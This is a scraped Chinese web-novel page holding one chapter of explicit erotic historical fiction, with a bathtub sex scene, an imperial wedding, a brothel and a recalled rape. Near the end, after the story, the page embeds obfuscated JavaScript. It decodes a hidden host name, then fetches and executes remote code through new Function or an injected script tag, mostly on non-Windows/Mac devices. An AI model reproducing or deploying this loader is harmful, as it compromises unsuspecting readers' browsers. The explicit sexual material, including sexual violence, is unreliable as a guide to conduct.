铅笔小说网

阅读记录  |   用户书架
上一章
目录 | 设置
下一页

寐江楼(四)(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |
电影推荐:辣妹神探(天天影院) 
热门推荐: 学长我错啦(H1V1吧?)暗许(1v1 年下)星帝睡前一篇小黄文桃花煞养尊处优的女仆大人

高大福与苏媚赤身裸体泡在木桶之中,两人刚折腾得面红耳赤,苏媚在水中瘫软着,花穴中渗出高大福刚射进去的精液,在水中散开。

“高大哥~多亏了你~媚儿才不必接客的。”苏媚娇嗔着,用手指刮了刮男人满是糙毛的胸膛。

高大福仿佛跌入温柔乡一般,涨红了脸,兴奋得道:“媚儿,下个月姨母就要把我派给连侍卫打下手了,到时候我的月银,能翻上好几番。”

苏媚装作不在意地问:“连侍卫?是什么人啊~”

高大福压低了声音:“明面上是楼主大人的贴身侍卫,背地里是那个你懂的,权力大得很,按理说楼主大人的宠儿甚多,却独独偏疼连鹊。”

苏媚连忙用藕臂环上高大福的脖子:“具体说说嘛!那楼主是男是女,多大了,媚儿好奇嘛。”

“楼主我们也没见过,只有姨母见过,她老人家神秘的很,从不出面,听说年近七十了!”

“七十岁!?”苏媚惊呼出声,却被高大福一把捂住了嘴巴。

“嘘,小心被别人听到。”

两人在水中结束了运动,就双双倒在床上搂着睡去,高大福的鼾声震耳欲聋,吵得苏媚睡不着,苏媚厌恶地将高大福推开,侧卧在一边,不知道在想着些什么。

拓跋彧大婚的日子临近,侧妃和妾室们在这几日已经由喜轿顺着皇子邸的角门抬了进去。

妾室要早正室几日入门,是为了要在正室入门时候,执妾礼,伺候皇子与皇妃拜堂与行房,第二日还要敬妾室茶,伺候皇子与皇妃用菜。

南宫芷兰看着进进出出的新人,张灯结彩热闹的皇子府,多了几分忧愁。

“姨娘,我们回去吧,这风口怪冷的,当心您的身子。”一旁的婢女劝到。

南宫芷兰红了眼眶,默默垂泪:“如今还有何人在意我的死活。”说罢她便转身离开了。

第二日,五皇子拓跋彧大婚。

北凌孟氏女由十六人抬得大红喜轿抬入银京。

其身后便是孟氏赔送给孟氏大小姐的十里红妆,这些嫁妆便就有百人抬着托出长长的一条街,足见孟大小姐的地位。

拓跋彧穿着喜服骑在汗血宝马上,在宫门口等着接亲,却不见脸上有丝毫喜色。

喜轿逐渐逼近,落轿后,几个丫鬟嬷嬷喜笑颜开,掀开轿帘,扶着一个盖着盖头,身影纤细的女子走出来。

德海捧着圣旨而来:“五皇子,皇子妃,请接旨!”

拓跋彧与孟氏并排而跪:“儿臣,儿媳接旨。”

“孤之第五爱子彧,睿质夙成,英姿特立,禀资奇伟,赋质端凝,孤甚爱重之,今有北凌孟氏女,诞钟粹美,含章秀出,太后赞有柔明之姿,懿淑之德,敬慎持躬,今孤命二人永结良好,同心同德,宜室宜家,永结鸾俦,共盟鸳蝶,特恩宠二人由中门入宫,钦此!”

此言一出,人群一阵骚动。

“中门而入可是太子大婚的礼制。”

朱红色的大门被缓缓打开,拓跋彧与孟氏谢恩后,由人引着从中门入宫。

拓跋彧看着身边的女子,眼眸低垂,心想若她是媚儿该有多好,嘴角勾起一阵苦涩的笑。

银帝与皇后早就在庆和殿等着了,银帝满意地看着眼前缓缓而来的新人。

二人互相执礼,喝合卺酒,结发。

一切流程都结束后,二人由车撵送回皇子府。

“皇后,这孟氏,当真一点也挑不出差错来。”银帝满意地道。

“皇后?”银帝见澹台皇后并未理会自己,只见她在看着离去的车撵发呆。

澹台皇后回过神来:“陛下说的是,毕竟是世家的女儿嘛,今日倒是让妾身想起来妾和陛下大婚之时?”

银帝听此将皇后拥入怀中:“曾经是孤对不住你,以后会加倍补偿你的。”

寐江楼

苏媚随同高大福来到了寐江楼。

寐江楼楼如其名,建在江渚之上,一到晚上整栋楼灯火通明,映照整个江面,周边行船也多,船中也配有许多船妓,可供人寻欢作乐,处在江州最繁华的地段。

这里的嫖客大多是有钱的商贾,地主,官员还有世家公子,完全不同于之前苏媚所处的分院。

寐江楼的女子也不同于之前的分院,分院都是些做皮肉生意的,而这里的风月女子有叁种,分别为清倌,红倌和梳拢。

清倌就是卖艺不卖身的,红倌既卖艺又卖身,而梳拢则是专被一些达官贵人包了的。

最高级的存在为瘦马,从小就是被专人培养,待成名后送给达官贵人做妾的。

苏媚好奇得东望望西望望,直到下来一个婢女,走到二人面前:“高大福,连公子叫你上去。”

苏媚跟着高大福走上二楼,二楼有许多雅间,七拐八拐地进了一间房。

只见是那天自己被高大福强奸时,见死不救的那个男子,坐在正堂处。

“连侍卫!”高大福赶紧抱拳,谄媚着说了一些谈近乎的话,又赶紧上前去,将一颗大大的夜明珠塞进一旁连鹊贴身婢女的手里。

function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间